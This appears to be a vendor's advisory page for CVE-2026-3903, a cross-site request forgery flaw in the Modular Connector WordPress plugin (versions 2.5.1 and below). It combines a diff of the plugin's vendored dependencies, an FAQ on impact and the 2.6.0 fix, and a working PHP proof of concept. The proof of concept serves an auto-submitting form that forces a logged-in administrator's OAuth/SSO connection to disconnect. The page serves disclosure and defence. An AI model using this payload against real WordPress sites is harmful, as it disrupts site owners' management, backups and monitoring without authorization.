- 'd50815e6b17c7a303c7b46d4b84940c9' => __DIR__ . '/..' . '/illuminate/collections/helpers.php',
- '8177eb8452b5f2def74f7a84f10909d2' => __DIR__ . '/..' . '/symfony/translation/Resources/functions.php',
- 'b7eb17c71b7471b81082198d82ac2eba' => __DIR__ . '/..' . '/illuminate/support/helpers.php',
- 'db9b6aa0d4216bbe4bdd6a868a1c3c1d' => __DIR__ . '/..' . '/symfony/polyfill-ctype/bootstrap.php',
- '52cfe9aa590fcc0c1694a7082506e776' => __DIR__ . '/..' . '/symfony/polyfill-php73/bootstrap.php',
- '0bb35f30d3329b99bbba5562b870bd30' => __DIR__ . '/..' . '/symfony/polyfill-intl-normalizer/bootstrap.php',
- '9e6a39e0d43293e35d548626a19914e2' => __DIR__ . '/..' . '/symfony/var-dumper/Resources/functions/dump.php',
- '295741e4046be8b88eb525c43c49c565' => __DIR__ . '/..' . '/symfony/polyfill-intl-grapheme/bootstrap.php',
- '20a7a7bcc69040dae36a2066103c03d6' => __DIR__ . '/..' . '/symfony/string/Resources/functions.php',
- 'e7cce8c90104d8023b8e1924fe68dd45' => __DIR__ . '/..' . '/symfony/polyfill-intl-idn/bootstrap.php',
- '93335753ca3dd3d62447d763cb9e59fd' => __DIR__ . '/..' . '/symfony/polyfill-php81/bootstrap.php',
- '521df67d2bb70bcfd3578de97168005a' => __DIR__ . '/..' . '/illuminate/events/functions.php',
- 'a588233e190377a8061b7da35424dbd1' => __DIR__ . '/..' . '/opis/closure/functions.php',
- 'bf3da3d01950ea9c21c430850c71aeba' => __DIR__ . '/..' . '/ralouphie/getallheaders/src/getallheaders.php',
- '2906cc65cc6372f5dd7a3285a9685bec' => __DIR__ . '/..' . '/ramsey/uuid/src/functions.php',
- '38b9b292125d0b1d8e77711522c3454e' => __DIR__ . '/..' . '/ares/framework/src/helpers.php',
- '574554cf4c9c164b356686693c60663e' => __DIR__ . '/..' . '/ares/framework/illuminate/Foundation/helpers.php',
- '4131bf6cb9e01ae628980e80ca81c354' => __DIR__ . '/..' . '/guzzlehttp/guzzle/src/functions_include.php',
+ 'be0e863a0b7d410051e3679684b89d05' => __DIR__ . '/..' . '/symfony/polyfill-php80/bootstrap.php',
+ 'cdccba37285717201be0cda22130b7c1' => __DIR__ . '/..' . '/symfony/polyfill-mbstring/bootstrap.php',
+ '4da8a5f965edcd26473fcbf2be82d7d7' => __DIR__ . '/..' . '/symfony/deprecation-contracts/function.php',
+ '5d7599fb41d4880e3bb858d832901e9a' => __DIR__ . '/..' . '/illuminate/collections/helpers.php',
+ '91ee1bbb29b3989967f6f8639a6d635d' => __DIR__ . '/..' . '/symfony/translation/Resources/functions.php',
+ 'b72b50162266450392ddd5c515a75818' => __DIR__ . '/..' . '/illuminate/support/helpers.php',
+ '9f49441cfe0691e56c9c67bd097c4350' => __DIR__ . '/..' . '/symfony/polyfill-ctype/bootstrap.php',
+ '2754c0fa2f40527b67501543ab0dae51' => __DIR__ . '/..' . '/symfony/polyfill-php73/bootstrap.php',
+ '67396cf9772d27504ccab5def06d1e52' => __DIR__ . '/..' . '/symfony/polyfill-intl-normalizer/bootstrap.php',
+ '49299b7cf704dda84b41286413c4d7e4' => __DIR__ . '/..' . '/symfony/var-dumper/Resources/functions/dump.php',
+ '36a37457274e471b69dac0ebf51b90b3' => __DIR__ . '/..' . '/symfony/polyfill-intl-grapheme/bootstrap.php',
+ 'e121a84a0c75bdd4c6e143812fa796a1' => __DIR__ . '/..' . '/symfony/string/Resources/functions.php',
+ 'f758949f401dc2a1f6a702b8afe6dfe4' => __DIR__ . '/..' . '/symfony/polyfill-intl-idn/bootstrap.php',
+ '4b27ba2df9dd92700018e46af777f34f' => __DIR__ . '/..' . '/symfony/polyfill-php81/bootstrap.php',
+ '5004fdd59b9e9307e6cd434a40d345f8' => __DIR__ . '/..' . '/illuminate/events/functions.php',
+ '92149af1b8cbd5859e99da0ff318c72f' => __DIR__ . '/..' . '/opis/closure/functions.php',
+ '929e580c79e3d98067c7165de1418f14' => __DIR__ . '/..' . '/ralouphie/getallheaders/src/getallheaders.php',
+ '2720919b2893441fad9f879d73593754' => __DIR__ . '/..' . '/ramsey/uuid/src/functions.php',
+ 'c0255d9fc9194fa59c7865314fa4fccd' => __DIR__ . '/..' . '/ares/framework/src/helpers.php',
+ 'abffc1041942c7350c813eb59081cf24' => __DIR__ . '/..' . '/ares/framework/illuminate/Foundation/helpers.php',
+ '7cb02eee968935cda8344cc3dbfa9620' => __DIR__ . '/..' . '/guzzlehttp/guzzle/src/functions_include.php',
);
public static $prefixLengthsPsr4 = array (
@@ -2671,7 +2671,6 @@
'Modular\Connector\Http\Controllers\ServerController' => __DIR__ . '/../..' . '/src/app/Http/Controllers/ServerController.php',
'Modular\Connector\Http\Controllers\WooCommerceController' => __DIR__ . '/../..' . '/src/app/Http/Controllers/WooCommerceController.php',
'Modular\Connector\Http\Kernel' => __DIR__ . '/../..' . '/src/app/Http/Kernel.php',
- 'Modular\Connector\Http\Middleware\Authenticate' => __DIR__ . '/../..' . '/src/app/Http/Middleware/Authenticate.php',
'Modular\Connector\Http\Middleware\AuthenticateLoopback' => __DIR__ . '/../..' . '/src/app/Http/Middleware/AuthenticateLoopback.php',
'Modular\Connector\Jobs\ConfigureDriversJob' => __DIR__ . '/../..' . '/src/app/Jobs/ConfigureDriversJob.php',
'Modular\Connector\Jobs\Health\ManagerHealthDataJob' => __DIR__ . '/../..' . '/src/app/Jobs/Health/ManagerHealthDataJob.php',
--- a/modular-connector/vendor/composer/installed.php
+++ b/modular-connector/vendor/composer/installed.php
@@ -3,7 +3,7 @@
'name' => 'modular/connector',
'pretty_version' => 'dev-master',
'version' => 'dev-master',
- 'reference' => '94b33cc67556b45c8dc2f69ae2fd8666c2b1d535',
+ 'reference' => 'ff508e7a68350177872cefc7c0cf72cab74fe5a1',
'type' => 'wordpres-plugin',
'install_path' => __DIR__ . '/../../',
'aliases' => array(),
@@ -11,9 +11,9 @@
),
'versions' => array(
'ares/framework' => array(
- 'pretty_version' => '3.6.5',
- 'version' => '3.6.5.0',
- 'reference' => '45994befc8442250b0213cf63274c61f0e2d8c86',
+ 'pretty_version' => '3.6.17',
+ 'version' => '3.6.17.0',
+ 'reference' => 'a912d44484836fec6ba90420f2bf2efa67084ec6',
'type' => 'library',
'install_path' => __DIR__ . '/../ares/framework',
'aliases' => array(),
@@ -56,9 +56,9 @@
'dev_requirement' => false,
),
'graham-campbell/result-type' => array(
- 'pretty_version' => 'v1.1.3',
- 'version' => '1.1.3.0',
- 'reference' => '3ba905c11371512af9d9bdd27d99b782216b6945',
+ 'pretty_version' => 'v1.1.4',
+ 'version' => '1.1.4.0',
+ 'reference' => 'e01f4a821471308ba86aa202fed6698b6b695e3b',
'type' => 'library',
'install_path' => __DIR__ . '/../graham-campbell/result-type',
'aliases' => array(),
@@ -301,16 +301,16 @@
'modular/connector' => array(
'pretty_version' => 'dev-master',
'version' => 'dev-master',
- 'reference' => '94b33cc67556b45c8dc2f69ae2fd8666c2b1d535',
+ 'reference' => 'ff508e7a68350177872cefc7c0cf72cab74fe5a1',
'type' => 'wordpres-plugin',
'install_path' => __DIR__ . '/../../',
'aliases' => array(),
'dev_requirement' => false,
),
'monolog/monolog' => array(
- 'pretty_version' => '2.10.0',
- 'version' => '2.10.0.0',
- 'reference' => '5cf826f2991858b54d5c3809bee745560a1042a7',
+ 'pretty_version' => '2.11.0',
+ 'version' => '2.11.0.0',
+ 'reference' => '37308608e599f34a1a4845b16440047ec98a172a',
'type' => 'library',
'install_path' => __DIR__ . '/../monolog/monolog',
'aliases' => array(),
@@ -341,9 +341,9 @@
'dev_requirement' => false,
),
'phpoption/phpoption' => array(
- 'pretty_version' => '1.9.4',
- 'version' => '1.9.4.0',
- 'reference' => '638a154f8d4ee6a5cfa96d6a34dfbe0cffa9566d',
+ 'pretty_version' => '1.9.5',
+ 'version' => '1.9.5.0',
+ 'reference' => '75365b91986c2405cf5e1e012c5595cd487a98be',
'type' => 'library',
'install_path' => __DIR__ . '/../phpoption/phpoption',
'aliases' => array(),
@@ -741,9 +741,9 @@
'dev_requirement' => false,
),
'vlucas/phpdotenv' => array(
- 'pretty_version' => 'v5.6.2',
- 'version' => '5.6.2.0',
- 'reference' => '24ac4c74f91ee2c193fa1aaa5c249cb0822809af',
+ 'pretty_version' => 'v5.6.3',
+ 'version' => '5.6.3.0',
+ 'reference' => '955e7815d677a3eaa7075231212f2110983adecc',
'type' => 'library',
'install_path' => __DIR__ . '/../vlucas/phpdotenv',
'aliases' => array(),
--- a/modular-connector/vendor/monolog/monolog/src/Monolog/ErrorHandler.php
+++ b/modular-connector/vendor/monolog/monolog/src/Monolog/ErrorHandler.php
@@ -136,7 +136,24 @@
*/
protected function defaultErrorLevelMap(): array
{
- return [E_ERROR => LogLevel::CRITICAL, E_WARNING => LogLevel::WARNING, E_PARSE => LogLevel::ALERT, E_NOTICE => LogLevel::NOTICE, E_CORE_ERROR => LogLevel::CRITICAL, E_CORE_WARNING => LogLevel::WARNING, E_COMPILE_ERROR => LogLevel::ALERT, E_COMPILE_WARNING => LogLevel::WARNING, E_USER_ERROR => LogLevel::ERROR, E_USER_WARNING => LogLevel::WARNING, E_USER_NOTICE => LogLevel::NOTICE, E_STRICT => LogLevel::NOTICE, E_RECOVERABLE_ERROR => LogLevel::ERROR, E_DEPRECATED => LogLevel::NOTICE, E_USER_DEPRECATED => LogLevel::NOTICE];
+ return [
+ E_ERROR => LogLevel::CRITICAL,
+ E_WARNING => LogLevel::WARNING,
+ E_PARSE => LogLevel::ALERT,
+ E_NOTICE => LogLevel::NOTICE,
+ E_CORE_ERROR => LogLevel::CRITICAL,
+ E_CORE_WARNING => LogLevel::WARNING,
+ E_COMPILE_ERROR => LogLevel::ALERT,
+ E_COMPILE_WARNING => LogLevel::WARNING,
+ E_USER_ERROR => LogLevel::ERROR,
+ E_USER_WARNING => LogLevel::WARNING,
+ E_USER_NOTICE => LogLevel::NOTICE,
+ 2048 => LogLevel::NOTICE,
+ // E_STRICT
+ E_RECOVERABLE_ERROR => LogLevel::ERROR,
+ E_DEPRECATED => LogLevel::NOTICE,
+ E_USER_DEPRECATED => LogLevel::NOTICE,
+ ];
}
/**
* @phpstan-return never
@@ -235,7 +252,7 @@
return 'E_USER_WARNING';
case E_USER_NOTICE:
return 'E_USER_NOTICE';
- case E_STRICT:
+ case 2048:
return 'E_STRICT';
case E_RECOVERABLE_ERROR:
return 'E_RECOVERABLE_ERROR';
--- a/modular-connector/vendor/monolog/monolog/src/Monolog/Formatter/MongoDBFormatter.php
+++ b/modular-connector/vendor/monolog/monolog/src/Monolog/Formatter/MongoDBFormatter.php
@@ -25,8 +25,6 @@
private $exceptionTraceAsString;
/** @var int */
private $maxNestingLevel;
- /** @var bool */
- private $isLegacyMongoExt;
/**
* @param int $maxNestingLevel 0 means infinite nesting, the $record itself is level 1, $record['context'] is 2
* @param bool $exceptionTraceAsString set to false to log exception traces as a sub documents instead of strings
@@ -35,7 +33,6 @@
{
$this->maxNestingLevel = max($maxNestingLevel, 0);
$this->exceptionTraceAsString = $exceptionTraceAsString;
- $this->isLegacyMongoExt = extension_loaded('mongodb') && version_compare((string) phpversion('mongodb'), '1.1.9', '<=');
}
/**
* {@inheritDoc}
@@ -108,27 +105,6 @@
}
protected function formatDate(DateTimeInterface $value, int $nestingLevel): UTCDateTime
{
- if ($this->isLegacyMongoExt) {
- return $this->legacyGetMongoDbDateTime($value);
- }
- return $this->getMongoDbDateTime($value);
- }
- private function getMongoDbDateTime(DateTimeInterface $value): UTCDateTime
- {
return new UTCDateTime((int) floor((float) $value->format('U.u') * 1000));
}
- /**
- * This is needed to support MongoDB Driver v1.19 and below
- *
- * See https://github.com/mongodb/mongo-php-driver/issues/426
- *
- * It can probably be removed in 2.1 or later once MongoDB's 1.2 is released and widely adopted
- */
- private function legacyGetMongoDbDateTime(DateTimeInterface $value): UTCDateTime
- {
- $milliseconds = floor((float) $value->format('U.u') * 1000);
- $milliseconds = PHP_INT_SIZE == 8 ? (int) $milliseconds : (string) $milliseconds;
- // @phpstan-ignore-next-line
- return new UTCDateTime($milliseconds);
- }
}
--- a/modular-connector/vendor/monolog/monolog/src/Monolog/Handler/Curl/Util.php
+++ b/modular-connector/vendor/monolog/monolog/src/Monolog/Handler/Curl/Util.php
@@ -37,14 +37,14 @@
$curlErrno = curl_errno($ch);
if (false === in_array($curlErrno, self::$retriableErrorCodes, true) || !$retries) {
$curlError = curl_error($ch);
- if ($closeAfterDone) {
+ if (PHP_VERSION_ID < 80000 && $closeAfterDone) {
curl_close($ch);
}
throw new RuntimeException(sprintf('Curl error (code %d): %s', $curlErrno, $curlError));
}
continue;
}
- if ($closeAfterDone) {
+ if (PHP_VERSION_ID < 80000 && $closeAfterDone) {
curl_close($ch);
}
return $curlResponse;
--- a/modular-connector/vendor/monolog/monolog/src/Monolog/Handler/MongoDBHandler.php
+++ b/modular-connector/vendor/monolog/monolog/src/Monolog/Handler/MongoDBHandler.php
@@ -11,12 +11,13 @@
*/
namespace ModularConnectorDependenciesMonologHandler;
+use ModularConnectorDependenciesMongoDBClient;
+use ModularConnectorDependenciesMongoDBCollection;
use MongoDBDriverBulkWrite;
use MongoDBDriverManager;
-use ModularConnectorDependenciesMongoDBClient;
-use ModularConnectorDependenciesMonologLogger;
use ModularConnectorDependenciesMonologFormatterFormatterInterface;
use ModularConnectorDependenciesMonologFormatterMongoDBFormatter;
+use ModularConnectorDependenciesMonologLogger;
/**
* Logs to a MongoDB database.
*
@@ -32,12 +33,12 @@
*/
class MongoDBHandler extends AbstractProcessingHandler
{
- /** @var MongoDBCollection */
+ /** @var Collection */
private $collection;
/** @var Client|Manager */
private $manager;
- /** @var string */
- private $namespace;
+ /** @var string|null */
+ private $namespace = null;
/**
* Constructor.
*
@@ -51,7 +52,7 @@
throw new InvalidArgumentException('MongoDBClient or MongoDBDriverManager instance required');
}
if ($mongodb instanceof Client) {
- $this->collection = $mongodb->selectCollection($database, $collection);
+ $this->collection = method_exists($mongodb, 'getCollection') ? $mongodb->getCollection($database, $collection) : $mongodb->selectCollection($database, $collection);
} else {
$this->manager = $mongodb;
$this->namespace = $database . '.' . $collection;
--- a/modular-connector/vendor/monolog/monolog/src/Monolog/Handler/RotatingFileHandler.php
+++ b/modular-connector/vendor/monolog/monolog/src/Monolog/Handler/RotatingFileHandler.php
@@ -141,7 +141,7 @@
// suppress errors here as unlink() might fail if two processes
// are cleaning up/rotating at the same time
set_error_handler(function (int $errno, string $errstr, string $errfile, int $errline): bool {
- return false;
+ return true;
});
unlink($file);
restore_error_handler();
--- a/modular-connector/vendor/monolog/monolog/src/Monolog/Handler/TelegramBotHandler.php
+++ b/modular-connector/vendor/monolog/monolog/src/Monolog/Handler/TelegramBotHandler.php
@@ -185,6 +185,9 @@
}
protected function sendCurl(string $message): void
{
+ if ('' === trim($message)) {
+ return;
+ }
$ch = curl_init();
$url = self::BOT_API . $this->apiKey . '/SendMessage';
curl_setopt($ch, CURLOPT_URL, $url);
--- a/modular-connector/vendor/monolog/monolog/src/Monolog/Processor/GitProcessor.php
+++ b/modular-connector/vendor/monolog/monolog/src/Monolog/Processor/GitProcessor.php
@@ -57,7 +57,7 @@
if (self::$cache) {
return self::$cache;
}
- $branches = `git branch -v --no-abbrev`;
+ $branches = shell_exec('git branch -v --no-abbrev');
if ($branches && preg_match('{^* (.+?)s+([a-f0-9]{40})(?:s|$)}m', $branches, $matches)) {
return self::$cache = ['branch' => $matches[1], 'commit' => $matches[2]];
}
--- a/modular-connector/vendor/monolog/monolog/src/Monolog/Processor/MercurialProcessor.php
+++ b/modular-connector/vendor/monolog/monolog/src/Monolog/Processor/MercurialProcessor.php
@@ -56,7 +56,7 @@
if (self::$cache) {
return self::$cache;
}
- $result = explode(' ', trim(`hg id -nb`));
+ $result = explode(' ', trim((string) shell_exec('hg id -nb')));
if (count($result) >= 3) {
return self::$cache = ['branch' => $result[1], 'revision' => $result[2]];
}
--- a/modular-connector/vendor/monolog/monolog/src/Monolog/SignalHandler.php
+++ b/modular-connector/vendor/monolog/monolog/src/Monolog/SignalHandler.php
@@ -70,6 +70,7 @@
*/
public function handleSignal(int $signo, $siginfo = null): void
{
+ /** @var array<int, string> $signals */
static $signals = [];
if (!$signals && extension_loaded('pcntl')) {
$pcntl = new ReflectionExtension('pcntl');
--- a/modular-connector/vendor/scoper-autoload.php
+++ b/modular-connector/vendor/scoper-autoload.php
@@ -14,7 +14,7 @@
// Restore the backup and ensure the excluded files are properly marked as loaded
$GLOBALS['__composer_autoload_files'] = array_merge(
$existingComposerAutoloadFiles,
- array_fill_keys(['db9b6aa0d4216bbe4bdd6a868a1c3c1d', '9eaa6b0f3f04e58e17ae5ecb754ea313', '295741e4046be8b88eb525c43c49c565', 'acbe0d033c55cd0a032b415e08d14f4c', 'e7cce8c90104d8023b8e1924fe68dd45', 'b48cbeb76a71e226a23fa64ac2b94dc6', '0bb35f30d3329b99bbba5562b870bd30', '36dfd6ed9dd74e8062aa61f09caf8554', '79edd977ef0c925a03e16b7120ad9fa1', '5928a00fa978807cf85d90ec3f4b0147', '52cfe9aa590fcc0c1694a7082506e776', '5a7bb63098496af4e240e58eddca59a9', '93335753ca3dd3d62447d763cb9e59fd', 'b178954ba4692b8876c08a4a97e6ce23', '28099935d0ea91a1b5e09408e356eacb', 'c5e5dfa7f2077b89dbc43523332b50aa', '674e404d8857dd99db32bc218bb5643a', '83cc8b953df9a6f7e51f674d84d57730', '9250916e8af80e0d1bb31401fd2e15a7', '99b27172349c9ec3abea78f62e2938bb', 'a875add15ea9a7df1a6c0c26cc9e4590', '1cbb53d50065225a14c2360be2ccbf6f', '54b9ab13bc86d8251a04a939888e357e', 'a89966141ddd51b9b7e868bc3b2f9bb0', '7bdb062931f6e7102434c3ad28423eb6', 'f49032536fdd06afd9df7191c3f21453', '18e965175c6bcd96deba6bc791a44373', '51421aa3e5e8003b70a289762d146a2a', '7edcabe1b67fbb38f4972a722bbbb429', '7b0b5d7b98f96ad751222ae5cc98cfcb', 'd1fb64fd99fc22e28e29a95cc0ea533a'], true)
+ array_fill_keys(['9f49441cfe0691e56c9c67bd097c4350', '9eaa6b0f3f04e58e17ae5ecb754ea313', '36a37457274e471b69dac0ebf51b90b3', 'acbe0d033c55cd0a032b415e08d14f4c', 'f758949f401dc2a1f6a702b8afe6dfe4', 'b48cbeb76a71e226a23fa64ac2b94dc6', '67396cf9772d27504ccab5def06d1e52', '36dfd6ed9dd74e8062aa61f09caf8554', 'cdccba37285717201be0cda22130b7c1', '5928a00fa978807cf85d90ec3f4b0147', '2754c0fa2f40527b67501543ab0dae51', 'be0e863a0b7d410051e3679684b89d05', '4b27ba2df9dd92700018e46af777f34f', 'b178954ba4692b8876c08a4a97e6ce23', '28099935d0ea91a1b5e09408e356eacb', 'c5e5dfa7f2077b89dbc43523332b50aa', '674e404d8857dd99db32bc218bb5643a', '83cc8b953df9a6f7e51f674d84d57730', '9250916e8af80e0d1bb31401fd2e15a7', '99b27172349c9ec3abea78f62e2938bb', 'a875add15ea9a7df1a6c0c26cc9e4590', '1cbb53d50065225a14c2360be2ccbf6f', '54b9ab13bc86d8251a04a939888e357e', 'a89966141ddd51b9b7e868bc3b2f9bb0', '7bdb062931f6e7102434c3ad28423eb6', 'f49032536fdd06afd9df7191c3f21453', '18e965175c6bcd96deba6bc791a44373', '51421aa3e5e8003b70a289762d146a2a', '7edcabe1b67fbb38f4972a722bbbb429', '7b0b5d7b98f96ad751222ae5cc98cfcb', 'd1fb64fd99fc22e28e29a95cc0ea533a'], true)
);
return $loader;
--- a/modular-connector/vendor/vlucas/phpdotenv/src/Parser/EntryParser.php
+++ b/modular-connector/vendor/vlucas/phpdotenv/src/Parser/EntryParser.php
@@ -149,7 +149,6 @@
});
});
}, Success::create([Value::blank(), self::INITIAL_STATE]))->flatMap(static function (array $result) {
- /** @psalm-suppress DocblockTypeContradiction */
if (in_array($result[1], self::REJECT_STATES, true)) {
/** @var GrahamCampbellResultTypeResult<DotenvParserValue, string> */
return Error::create('a missing closing quote');
--- a/modular-connector/vendor/vlucas/phpdotenv/src/Repository/Adapter/EnvConstAdapter.php
+++ b/modular-connector/vendor/vlucas/phpdotenv/src/Repository/Adapter/EnvConstAdapter.php
@@ -45,7 +45,6 @@
if ($value === true) {
return 'true';
}
- /** @psalm-suppress PossiblyInvalidCast */
return (string) $value;
});
}
--- a/modular-connector/vendor/vlucas/phpdotenv/src/Repository/Adapter/ServerConstAdapter.php
+++ b/modular-connector/vendor/vlucas/phpdotenv/src/Repository/Adapter/ServerConstAdapter.php
@@ -45,7 +45,6 @@
if ($value === true) {
return 'true';
}
- /** @psalm-suppress PossiblyInvalidCast */
return (string) $value;
});
}Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3903 - Modular Connector <= 2.5.1 - Cross-Site Request Forgery via postConfirmOauth
<?php
/**
* Proof of Concept for CVE-2026-3903
* CSRF vulnerability in Modular Connector WordPress plugin <= 2.5.1
* Targets the postConfirmOauth() function to disconnect OAuth/SSO connections
*
* Usage: Host this file on an attacker-controlled server and trick an administrator
* to visit the page while logged into WordPress.
*/
$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php';
// The vulnerable endpoint uses the modular_connector_oauth action
// The type parameter must be 'oauth' to trigger the vulnerable code path
// The state parameter simulates an OAuth disconnection request
$csrf_payload = [
'action' => 'modular_connector_oauth',
'type' => 'oauth',
'state' => 'disconnect',
'origin' => 'mo'
];
// Build the malicious URL with parameters
$attack_url = $target_url . '?' . http_build_query($csrf_payload);
// Create a self-submitting HTML form for automatic CSRF attack
// This executes when the page loads without user interaction
echo '<!DOCTYPE html>
<html>
<head>
<title>Loading...</title>
</head>
<body>
<h2>Please wait while we redirect you...</h2>
<form id="csrf_form" method="GET" action="' . htmlspecialchars($target_url) . '">
<input type="hidden" name="action" value="modular_connector_oauth">
<input type="hidden" name="type" value="oauth">
<input type="hidden" name="state" value="disconnect">
<input type="hidden" name="origin" value="mo">
</form>
<script>
// Auto-submit the form when page loads
document.addEventListener("DOMContentLoaded", function() {
document.getElementById("csrf_form").submit();
});
</script>
</body>
</html>';
// Alternative: Direct link version for manual testing
// echo "<a href='" . htmlspecialchars($attack_url) . "'>Click to trigger CSRF</a>";
// Note: This PoC assumes the administrator is currently logged into WordPress
// and has the Modular Connector plugin installed and connected via OAuth/SSO.
// Successful exploitation will disconnect the plugin's OAuth connection.
?>Frequently Asked Questions
What is CVE-2026-3903?
Understanding the vulnerabilityCVE-2026-3903 is a Cross-Site Request Forgery (CSRF) vulnerability in the Modular Connector plugin for WordPress, affecting versions up to and including 2.5.1. It allows unauthenticated attackers to disconnect OAuth/SSO connections by tricking an authenticated administrator into performing an action.
How does the vulnerability work?
Mechanism of exploitationThe vulnerability arises from missing nonce validation in the postConfirmOauth() function. This function processes requests to confirm or disconnect OAuth connections without verifying the authenticity of the request, enabling attackers to forge requests.
Who is affected by this vulnerability?
Identifying vulnerable installationsAny WordPress site using the Modular Connector plugin version 2.5.1 or earlier is affected. Administrators should check their plugin version in the WordPress dashboard under the ‘Plugins’ section.
How can I check if my site is vulnerable?
Version verificationTo determine if your site is vulnerable, navigate to the ‘Plugins’ section in your WordPress admin panel and check the version of the Modular Connector plugin. If it is 2.5.1 or lower, your site is at risk.
How can I fix this vulnerability?
Updating the pluginThe vulnerability is patched in version 2.6.0 of the Modular Connector plugin. Updating to this version will mitigate the risk associated with CVE-2026-3903.
What does the severity rating mean?
Understanding risk levelsCVE-2026-3903 has a medium severity rating with a CVSS score of 4.3. This indicates a moderate risk where exploitation may disrupt service but may not lead to severe consequences if mitigated promptly.
What is nonce validation and why is it important?
Role of nonce in securityNonce validation is a security measure that ensures requests are legitimate and originate from authenticated users. It prevents CSRF attacks by requiring a unique token for each request, which the server verifies.
How does the proof of concept demonstrate the issue?
Example of exploitationThe proof of concept illustrates how an attacker can craft a malicious link that triggers the vulnerable endpoint. If an administrator clicks this link while logged in, it sends a forged request that disconnects the OAuth connection.
What are the potential impacts of this vulnerability?
Consequences of exploitationExploitation of this vulnerability can disrupt the site’s integration with the Modular DS management platform, affecting backup, update, and monitoring functionalities. It may also lead to unauthorized disconnections of OAuth/SSO connections.
What steps should I take after updating the plugin?
Post-update actionsAfter updating to version 2.6.0, verify that your OAuth connections are functioning correctly. Additionally, review your site’s security practices to prevent future vulnerabilities.
Are there any additional security measures I should consider?
Enhancing overall securityIn addition to updating the plugin, consider implementing security plugins that monitor for suspicious activity, regularly auditing user permissions, and educating administrators about phishing attacks.
Where can I find more information about this vulnerability?
Resources for further readingMore information about CVE-2026-3903 can be found on the official CVE database and security advisories from the plugin developers. Staying informed through security forums and updates is also recommended.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
